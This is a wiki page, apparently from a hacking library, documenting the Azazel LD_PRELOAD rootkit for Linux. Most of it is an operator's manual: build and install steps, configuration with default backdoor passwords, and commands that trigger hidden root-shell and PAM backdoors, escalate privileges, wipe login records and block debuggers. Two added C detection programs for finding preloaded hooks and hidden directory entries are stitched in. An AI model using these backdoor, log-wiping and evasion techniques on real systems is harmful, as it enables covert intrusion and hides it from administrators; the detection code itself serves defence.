Azazel

Azazel is a Linux userland rootkit written in C that uses the LD_PRELOAD technique to hook libc functions and hide its presence. It features log cleaning, process hiding, anti-debugging techniques, and includes both plaintext and encrypted backdoors that provide remote interactive shells. The rootkit focuses on evading detection tools such as lsof, ps and unhide through techniques like selectively not hooking those programs and obfuscating its strings.
Azazel is a userland rootkit written in C based off of the original LD_PRELOAD technique from the Jynx rootkit. It is more robust and has additional features, and focuses heavily around anti-debugging and anti-detection. Features include log cleaning, pcap subversion, and more.
Contents
1 Disclaimer
2 Features
3 Latest Source
4 Hooking Methods
5 Configuration
6 Backdoor Examples
6.1 Plaintext backdoor
6.2 Crypthook backdoor
6.3 PAM backdoor
7 Log Clearing
8 Anti-Debugging
9 Process Hiding
10 Preliminary ldd/unhide obfuscation
11 Removal
12 Related
Disclaimer
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you.
Features
Anti-debugging
Avoids unhide, lsof, ps, ldd detection
Hides files and directories
Hides remote connections
Hides processes
Hides logins
PCAP hooks avoid local sniffing
Two accept backdoors with full PTY shells:
    Crypthook encrypted accept() backdoor
    Plaintext accept() backdoor
PAM backdoor for local privesc and remote entry
Log cleanup for utmp/wtmp entries based on pty
Uses xor to obfuscate static strings
Latest Source
Clone the sources
Terminal
localhost:~$ git clone https://github.com/chokepoint/azazel.git
Build the rootkit
Terminal
localhost:~$ make
Running "make install" will inject the live kit into your system. While removal is not impossible, it's an unnecessary and painful procedure, not to mention you may forget to remove it.
Hooking Methods
Azazel utilizes the same hooking methods as Jynx/Jynx2. You can hook individual programs at the time of execution by taking advantage of the LD_PRELOAD variable. By default, Azazel installs itself as libselinux.so into /lib. An entry is then added to /etc/ld.so.preload in order to hook system-wide dynamically compiled programs.
Example runtime hooking of bash.
Terminal
localhost:~$ LD_PRELOAD=/lib/libselinux.so bash -l
Instead of dlsym'ing direct libc functions by globally declaring old_syscall, Azazel has a new structure in azazel.h named syscall_list. This allows all of the required functions to be linked upon initiation of the library. Syscall function names are XORed by config.py and written to const.h. Original libc functions can be accessed by using the preprocessor definitions also in const.h. Each definition has a prefix of SYS_ followed by the name of the function in caps. For example, to call libc's version of fopen, you would use syscalls[SYS_FOPEN].syscall_func()
typedef struct struct_syscalls {
    char syscall_name[51];      /* name of the libc function to resolve */
    void *(*syscall_func)();    /* pointer to the original libc implementation */
} s_syscalls;
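From the defender's side, the same linker mechanism can be turned around: the added example below (not code from Azazel or from the original page) asks the dynamic linker which shared object currently serves each libc symbol, so a preloaded /lib/libselinux.so shows up as the provider instead of libc. The watched-symbol list (fopen, ptrace and accept are named on this page; readdir is assumed) and the "libc*/ld-*" naming rule are assumptions for this example.

```c
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* libc functions this page documents Azazel hooking (fopen, ptrace, accept);
 * readdir is added on the assumption that file hiding goes through it. */
static const char *const WATCHED[] = { "fopen", "ptrace", "accept", "readdir" };
#define NWATCHED (sizeof WATCHED / sizeof WATCHED[0])

/* Path of the shared object that currently satisfies `sym` in the global
 * scope, i.e. where a call from any dynamically linked program would land.
 * With a preloaded rootkit library this is that library, not libc. */
const char *provider_of(const char *sym) {
    void *addr = dlsym(RTLD_DEFAULT, sym);
    Dl_info info;
    if (addr == NULL || dladdr(addr, &info) == 0 || info.dli_fname == NULL)
        return "(unresolved)";
    return info.dli_fname;
}

/* A libc symbol should be served by the C library (basename libc*) or the
 * dynamic loader (ld-*); any other provider is reported (assumed rule). */
int provider_is_expected(const char *path) {
    const char *base = strrchr(path, '/');
    base = base ? base + 1 : path;
    return strncmp(base, "libc", 4) == 0 || strncmp(base, "ld-", 3) == 0;
}

/* Returns how many watched symbols resolve to an unexpected object. */
int count_hijacked(void) {
    int hijacked = 0;
    for (size_t i = 0; i < NWATCHED; i++) {
        const char *p = provider_of(WATCHED[i]);
        if (!provider_is_expected(p)) {
            printf("%-8s -> %s\n", WATCHED[i], p);
            hijacked++;
        }
    }
    return hijacked;
}

int main(void) {
    /* Both persistence points named on this page: the env var and the loader file. */
    const char *env = getenv("LD_PRELOAD");
    printf("LD_PRELOAD=%s\n", env ? env : "(unset)");
    printf("/etc/ld.so.preload: %s\n", access("/etc/ld.so.preload", F_OK) == 0 ? "present" : "absent");
    int n = count_hijacked();
    printf("%d watched symbol(s) resolved outside libc\n", n);
    return n ? 1 : 0;
}
```

Because the check runs inside the same process, a preload library could in principle hook dlsym/dladdr as well, so a clean result only rules out what is visible from userland; run it from a statically linked or known-good binary where possible.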
Configuration
All variables that require changing prior to deployment are located near the top of config.py. Variable data is ciphered using an XOR key in order to not expose them to dumping programs like "strings." See below for a list of variables and their associated purpose.
The rootkit will hide all TCP/IP connections within these HIGH and LOW port ranges. These ranges are used to not only hide from netstat/lsof, but also to hide from sniffing using libpcap.

Variable(s)             Description                                                                Default
LOW_PORT / HIGH_PORT    Ports used to trigger full PTY plaintext backdoor.                         61040 / 61050
CRYPT_LOW / CRYPT_HIGH  Ports used to trigger full PTY crypthook backdoor.                         61051 / 61060
PAM_PORT                Also hides this port but doesn't trigger accept backdoor.                  61061
SHELL_MSG               Display this string to users once they get a shell.                        Welcome
SHELL_PASSWD            Shell password for both plaintext and crypthook backdoors.                 changeme
SHELL_TYPE              Use this shell for accept() backdoors.                                     /bin/bash
MAGIC_STRING            Hide any files with this string in the filename.                           __
BLIND_LOGIN             Fake user account used to activate the PAM backdoor.                       rootme
ANTI_DEBUG_MSG          Display this message to the sysadmin if they try to ptrace.                Don't scratch the walls.
CLEANUP_LOGS            If this environment var is set to a valid pts, then clean up utmp/wtmp     CLEANUP_LOGS
                        logs for that pts.

The following variables are specifically included for the crypthook backdoor.

Variable(s)             Description                                                                Default
PASSPHRASE              This key is used for encryption/decryption of sessions.                    HelloNSA
KEY_SALT                Key salt used for key derivation.                                          changeme
Backdoor Examples
For each of these examples we are assuming that sshd is hooked with azazel and able to trigger any of the three operational backdoors.
Plaintext backdoor
We need to set the local port to something within the ranges of LOW_PORT and HIGH_PORT as configured above. This not only ensures that the connection will be hidden from local sniffing and detection, but it also triggers a full PTY interactive shell upon entering the correct password. The local port can be set using ncat's -p option. Upon successfully connecting to the remote daemon, the first line you enter should be the SHELL_PASSWD that you created.
$ ncat target 22 -p 61040
changeme
Welcome!
Here's a shell.
root@host:/root #
Crypthook backdoor
Triggering the Crypthook backdoor is similar to the plaintext backdoor, but we need to speak the same protocol. Crypthook is an AES encryption wrapper for TCP/UDP connections and can be downloaded from here. Crypthook relies on preload hooking as well, and can be used with netcat by utilizing the LD_PRELOAD environment variable.
$ LD_PRELOAD=./crypthook.so ncat localhost 22 -p 61051
changeme
Welcome!
Here's a shell.
root@host:/root/ #
PAM backdoor
The PAM hooks work by waiting for the specified fake user to attempt a connection. The hooks return the pw entry for root and accept any password to establish a successful login. Since this method would generally be used with sshd, the connection will not be hidden unless you can force the ssh client to bind to a local port within one of the port ranges. Another client shared library has been included to force a program to bind to a port that we'd like to hide.
$ make client
$ LD_PRELOAD=./client.so ssh rootme@localhost
root@host:/ #
The PAM hooks can also be used for local privesc.
$ su - rootme
#
Log Clearing
Log clearing can be accomplished by setting the environment variable to the tty/pts device that you want to remove from the records and then executing a command. When accessing the target system using either of the accept backdoors, the given pseudoterminal is automatically removed from both utmp and wtmp log files. However, if you need to use the PAM backdoor through SSH, you will need to manually remove your pts from the logs as demonstrated below.
$ w | grep pts/16
root pts/16 :0.0 Wed16 2:33m 0.16s 0.16s bash
$ CLEANUP_LOGS="pts/16" ls
utmp logs cleaned up.
wtmp logs cleaned up.
$ w | grep pts/16
$
Anti-Debugging
Azazel hooks ptrace() and returns 1, hence denying any debugging from occurring. The message displayed to the sysadmin is really more of a joke than anything and will definitely set off alarms that something is wrong.
$ strace -p $PPID
Don't scratch the walls
This works on any userland debugger (ltrace, strace, gdb, ftrace). This hook could be easily extended to hide specific information should you desire to do so.
Process Hiding
Jynx/Jynx2 relied on a specified GID in order to hide processes and files. There are some obvious problems with using this method, so Azazel addresses this by again using environment variables to mask any processes that may give away our presence. The variable can also be configured inside of config.py, but defaults to HIDE_THIS_SHELL.
$ env HIDE_THIS_SHELL=plz ncat -l -p 61061
When this environment variable is set, the process is able to see files and processes hidden by the rootkit. This is important for the PAM hook. Because PAM invokes bash on its own, you have to use this environment variable to access hidden files.
Preliminary ldd/unhide obfuscation
Azazel avoids detection from ldd and unhide by selectively NOT hooking those two programs. Once the programs are done, azazel continues hooking programs as normal. This opens up a window for removing the offending library, but at this point it is better than completely revealing the kit. The next release will include a more advanced anti-debug/ldd/unhide obfuscation.
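The file and process hiding described above, and the reliance on unhide not being hooked, can be checked without trusting libc at all: the added example below (not code from Azazel or from this page) lists a directory once through readdir(), which a preloaded library can filter, and once through the raw getdents64 system call, which LD_PRELOAD cannot intercept, and reports the difference. Run on /proc it exposes hidden PIDs; on a data directory it exposes names hidden by MAGIC_STRING. The entry limit and buffer size are assumptions for this example.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Record layout the kernel returns from getdents64 (not exported by glibc). */
struct linux_dirent64 {
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

/* Returns the number of names the raw getdents64 walk produced that libc's
 * readdir() did not, printing each one; -1 if `dir` cannot be opened.
 * Assumed demo limit: at most 1024 libc entries are remembered, so a bigger
 * directory would yield false positives. */
int count_hidden_entries(const char *dir) {
    static char seen[1024][256];
    int nseen = 0;
    DIR *d = opendir(dir);                       /* hookable libc view */
    if (d == NULL) return -1;
    struct dirent *e;
    while ((e = readdir(d)) != NULL && nseen < 1024)
        snprintf(seen[nseen++], sizeof seen[0], "%s", e->d_name);
    closedir(d);

    /* Raw view: open and read the directory with direct system calls only. */
    int fd = (int)syscall(SYS_openat, AT_FDCWD, dir, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    char buf[16384] __attribute__((aligned(8)));
    int hidden = 0;
    long n;
    while ((n = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0) {
        for (long off = 0; off < n;) {
            struct linux_dirent64 *de = (struct linux_dirent64 *)(buf + off);
            int found = 0;
            for (int i = 0; i < nseen && !found; i++)
                found = strcmp(seen[i], de->d_name) == 0;
            if (!found) { printf("hidden from readdir(): %s/%s\n", dir, de->d_name); hidden++; }
            off += de->d_reclen;
        }
    }
    close(fd);
    return hidden;
}
```

Compile it statically (gcc -static) to run the libc half of the comparison without the preload library being loaded at all; on a clean host both walks agree and the function returns 0.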
Removal
To remove Azazel, the best course of action is to boot into a live CD, mount your bootable hard drive, and delete the /etc/ld.so.preload file from the partition.
Related
Linux
LD_PRELOAD
C
CryptHook (http://www.chokepoint.net/2013/09/crypthooksecuretcpudpconnection.html)
Jynx
Hooking PAM
Retrieved from "http://www.blackhatlibrary.net/Azazel"
This page was last modified on 14 February 2014, at 02:34.